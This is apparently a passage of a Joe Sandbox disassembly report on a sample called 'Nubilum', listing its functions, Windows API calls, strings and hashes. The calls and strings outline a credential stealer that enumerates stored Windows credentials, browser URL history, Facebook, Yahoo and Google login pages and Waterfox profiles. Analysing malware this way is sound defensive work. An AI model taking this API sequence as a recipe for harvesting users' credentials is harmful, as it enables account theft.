                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                          • CloseHandle.KERNEL32(?), ref: 0040E148
                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                          • String ID: bhv
                          • API String ID: 327780389-2689659898
                          • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                          • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                          • API String ID: 2941347001-70141382
                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                          • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040C298
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                          • wcschr.MSVCRT ref: 0040C324
                          • wcschr.MSVCRT ref: 0040C344
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                          • GetLastError.KERNEL32 ref: 0040C373
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                          • String ID: visited:
                          • API String ID: 2470578098-1702587658
                          • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                          • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 663 40e175-40e1a1 call 40695d call 406b90 668 40e1a7-40e1e5 memset 663->668 669 40e299-40e2a8 call 4069a3 663->669 671 40e1e8-40e1fa call 406e8f 668->671 675 40e270-40e27d call 406b53 671->675 676 40e1fc-40e219 call 40dd50 * 2 671->676 675->671 681 40e283-40e286 675->681 676->675 687 40e21b-40e21d 676->687 684 40e291-40e294 call 40aa04 681->684 685 40e288-40e290 ??3@YAXPAX@Z 681->685 684->669 685->684 687->675 688 40e21f-40e235 call 40742e 687->688 688->675 691 40e237-40e242 call 40aae3 688->691 691->675 694 40e244-40e26b _snwprintf call 40a8d0 691->694 694->675
                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                          • memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                          • _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                          • API String ID: 3883404497-2982631422
                          • Opcode ID: 30b20afd110d2fca300a1e6f1181ee72335b5a4e82da81a5fff2aa0aaab9b1e7
                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                          • Opcode Fuzzy Hash: 30b20afd110d2fca300a1e6f1181ee72335b5a4e82da81a5fff2aa0aaab9b1e7
                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                          • memset.MSVCRT ref: 0040BC75
                          • memset.MSVCRT ref: 0040BC8C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                          • memcmp.MSVCRT ref: 0040BCD6
                          • memcpy.MSVCRT ref: 0040BD2B
                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                          • String ID:
                          • API String ID: 509814883-3916222277
                          • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                          • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 41837f-4183bf 765 4183c1-4183cc call 418197 764->765 766 4183dc-4183ec call 418160 764->766 771 4183d2-4183d8 765->771 772 418517-41851d 765->772 773 4183f6-41840b 766->773 774 4183ee-4183f1 766->774 771->766 775 418417-418423 773->775 776 41840d-418415 773->776 774->772 777 418427-418442 call 41739b 775->777 776->777 780 418444-41845d CreateFileW 777->780 781 41845f-418475 CreateFileA 777->781 782 418477-41847c 780->782 781->782 783 4184c2-4184c7 782->783 784 41847e-418495 GetLastError ??3@YAXPAX@Z 782->784 787 4184d5-418501 memset call 418758 783->787 788 4184c9-4184d3 783->788 785 4184b5-4184c0 call 444706 784->785 786 418497-4184b3 call 41837f 784->786 785->772 786->772 794 418506-418515 ??3@YAXPAX@Z 787->794 788->787 794->772
                          APIs
                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                          • GetLastError.KERNEL32 ref: 0041847E
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CreateFile$??3@ErrorLast
                          • String ID: |A
                          • API String ID: 1407640353-1717621600
                          • Opcode ID: cddcad6bce7e241d28976a522cb323b7bed0449e87b005469fdf17cb4ba43f93
                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                          • Opcode Fuzzy Hash: cddcad6bce7e241d28976a522cb323b7bed0449e87b005469fdf17cb4ba43f93
                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 795 4032b4-403330 call 44db70 call 402850 EntryPoint call 445103 call 44553b 803 403335-403349 call 4452e5 795->803 806 403480-40349b call 40368c call 40b633 803->806 807 40334f-403353 803->807 809 403358-40335e 807->809 811 403360-403367 809->811 812 403379 809->812 811->812 813 403369-403377 811->813 814 40337b-4033e0 call 402808 memset memcpy 812->814 813->814 819 4033e2-4033ea 814->819 820 4033ec-403405 wcscmp 814->820 819->820 821 403467-40347a 819->821 822 403414-403442 call 4028e7 _wcsicmp 820->822 823 403407-403412 820->823 821->806 821->809 824 403457-403462 call 40f508 822->824 828 403444-40344e 822->828 823->824 824->821 828->824 829 403450 828->829 829->824
                          APIs
                          • EntryPoint.NUBILUM ref: 00403311
                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 004033B7
                          • memcpy.MSVCRT ref: 004033D0
                          • wcscmp.MSVCRT ref: 004033FC
                          • _wcsicmp.MSVCRT ref: 00403439
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$??3@EntryPoint_wcsicmpmemcpywcscmpwcsrchr
                          • String ID: $0.@
                          • API String ID: 219370857-1896041820
                          • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                          • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                          • String ID: r!A
                          • API String ID: 2791114272-628097481
                          • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                          • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                          APIs
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                          • wcslen.MSVCRT ref: 0040C82C
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                          • API String ID: 62308376-4196376884
                          • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                          • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                          APIs
                          • memset.MSVCRT ref: 0040A824
                          • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                          • wcscpy.MSVCRT ref: 0040A854
                          • wcscat.MSVCRT ref: 0040A86A
                          • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                          • LoadLibraryW.KERNEL32(?), ref: 0040A884
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID: C:\Windows\system32
                          • API String ID: 669240632-2896066436
                          • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                          • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                          APIs
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                          • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                          • wcslen.MSVCRT ref: 0040BE06
                          • _wcsncoll.MSVCRT ref: 0040BE38
                          • memset.MSVCRT ref: 0040BE91
                          • memcpy.MSVCRT ref: 0040BEB2
                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                          • wcschr.MSVCRT ref: 0040BF24
                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                          • String ID:
                          • API String ID: 3191383707-0
                          • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                          • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                          APIs
                          • memset.MSVCRT ref: 00403CBF
                          • memset.MSVCRT ref: 00403CD4
                          • memset.MSVCRT ref: 00403CE9
                          • memset.MSVCRT ref: 00403CFE
                          • memset.MSVCRT ref: 00403D13
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403DDA
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Waterfox$Waterfox\Profiles
                          • API String ID: 4039892925-11920434
                          • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                          • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                          APIs
                          • memset.MSVCRT ref: 00403E50
                          • memset.MSVCRT ref: 00403E65
                          • memset.MSVCRT ref: 00403E7A
                          • memset.MSVCRT ref: 00403E8F
                          • memset.MSVCRT ref: 00403EA4
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
